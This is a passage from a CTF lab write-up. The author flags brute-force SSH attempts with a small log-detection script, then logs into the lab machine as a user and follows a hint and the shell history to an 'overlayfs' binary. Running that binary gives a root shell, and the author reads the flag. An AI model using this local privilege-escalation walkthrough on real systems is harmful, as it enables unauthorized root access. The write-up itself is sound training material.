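    "Sep 17 02:50:07 acid sshd[1207]: Failed password for invalid user acid.exploit from 192.168.56.102 port 40106 ssh2",
    "Sep 17 02:50:09 acid sshd[1209]: Failed password for invalid user avinash from 192.168.56.102 port 40108 ssh2",
    "Sep 17 02:50:11 acid sshd[1211]: Failed password for makke from 192.168.56.102 port 40110 ssh2",
    "Sep 17 02:51:37 acid sshd[1240]: Accepted password for makke from 192.168.56.102 port 40130 ssh2",
]

if __name__ == "__main__":
    for kind, src in detect(SAMPLE_LOG):
        print(kind, src)
```

Medusa’s default behaviour, one password at a time per user with no delay, is exactly the shape a threshold like this catches; the second alert is the one that matters, since a success after a burst is a likely compromise rather than a typo.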

So, once I got in I found a hidden file called .hint

ssh makke@192.168.56.103
    _    ____ ___ ____        ____  _____ _     ___    _    ____  _____ ____  
   / \  / ___|_ _|  _ \      |  _ \| ____| |   / _ \  / \  |  _ \| ____|  _ \ 
  / _ \| |    | || | | |_____| |_) |  _| | |  | | | |/ _ \ | | | |  _| | | | |
 / ___ \ |___ | || |_| |_____|  _ <| |___| |__| |_| / ___ \| |_| | |___| |_| |
/_/   \_\____|___|____/      |_| \_\_____|_____\___/_/   \_\____/|_____|____/ 

                                    -by Acid

Wanna Knock me out ??? 
3.2.1 Let's Start the Game.
                                                                              
makke@192.168.56.103's password: 
Welcome to Ubuntu 15.04 (GNU/Linux 3.19.0-15-generic i686)

 * Documentation:  https://help.ubuntu.com/

Last login: Thu Sep 17 02:51:37 2015 from 192.168.56.102
makke@acid:~$ ls -la
total 32
drwxr-xr-x 3 makke makke 4096 Aug 24 21:28 .
drwxr-xr-x 4 root  root  4096 Aug 24 19:11 ..
-rw------- 1 makke makke  225 Sep 17 02:52 .bash_history
-rw-r--r-- 1 makke makke  220 Aug 24 19:11 .bash_logout
-rw-r--r-- 1 makke makke 3760 Aug 24 19:11 .bashrc
drwx------ 2 makke makke 4096 Aug 24 21:25 .cache
-rw-rw-r-- 1 makke makke   40 Aug 24 21:28 .hint
-rw-r--r-- 1 makke makke  675 Aug 24 19:11 .profile
makke@acid:~$ cat .hint
Run the executable to own kingdom :-)

I’m not quite sure what that means, but one of my habits is to check the user’s command history:

makke@acid:~$ history
    1  exit
    2  cd ..
    3  clear
    4  cd /
    5  ls
    6  cd bin/
    7  clear
    8  ./overlayfs 
    9  clear
   10  cd /home/makke/
   11  clear
   12  nano .hint
   13  clear
   14  ls
   15  clear
   16  ls
   17  ls -a
   18  cat .hint 
   19  clear
   20  cd /bin/
   21  ls
   22  ./overlayfs 
   23  clear
   24  wgt
   25  wget
   26  apt-get remove wget
   ...

What is this?

20  cd /bin/
21  ls
22  ./overlayfs 

Interesting, an executable…

I had a look on Wikipedia, then I executed it:

makke@acid:/bin$ ./overlayfs 
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami    
root

Yes! Holy words!

I carried on investigating in the /root folder, and then I found the flag!

# pwd
/bin
# cd /root  
# ls -l
total 0
# ls -la
total 68
drwx------  5 root root  4096 Aug 24 21:32 .
drwxr-xr-x 22 root root  4096 Aug 24 20:58 ..
-rw-------  1 root root 23934 Aug 24 22:25 .bash_history
-rw-r--r--  1 root root  3135 Aug  8 18:02 .bashrc
drwx------  2 root root  4096 Aug 24 17:46 .cache
drwx------  3 root root  4096 Aug  6 17:55 .config
drwx------  3 root root  4096 Aug  6 15:51 .dbus
-rw-r--r--  1 root root   284 Aug 24 20:57 .flag.txt
-rw-------  1 root root  2775 Aug 24 21:32 .mysql_history
-rw-------  1 root root   147 Aug 24 23:32 .nano_history
-rw-r--r--  1 root root   140 Feb 20  2014 .profile
-rw-r--r--  1 root root    66 Aug  6 17:31 .selected_editor
# cat .flag.txt 
Dear Hax0r,

You have completed the Challenge Successfully.

Your Flag is : "Black@Current@Ice-Cream"

Kind & Best Regards

-ACiD

Twitter:https://twitter.com/m_avinash143
Facebook: https://www.facebook.com/M.avinash143
LinkedIN: https://in.linkedin.com/pub/avinash-thapa/101/406/4b5
# 

Conclusion

I must say that this CTF wasn’t so easy. It was quite different from the first chapter, where the root password had been under my nose the whole time :) But it’s been challenging, and I had a lot of fun completing it :) Thank you Avinash.

As usual, for any information or comments, please do not hesitate to leave a comment.

./A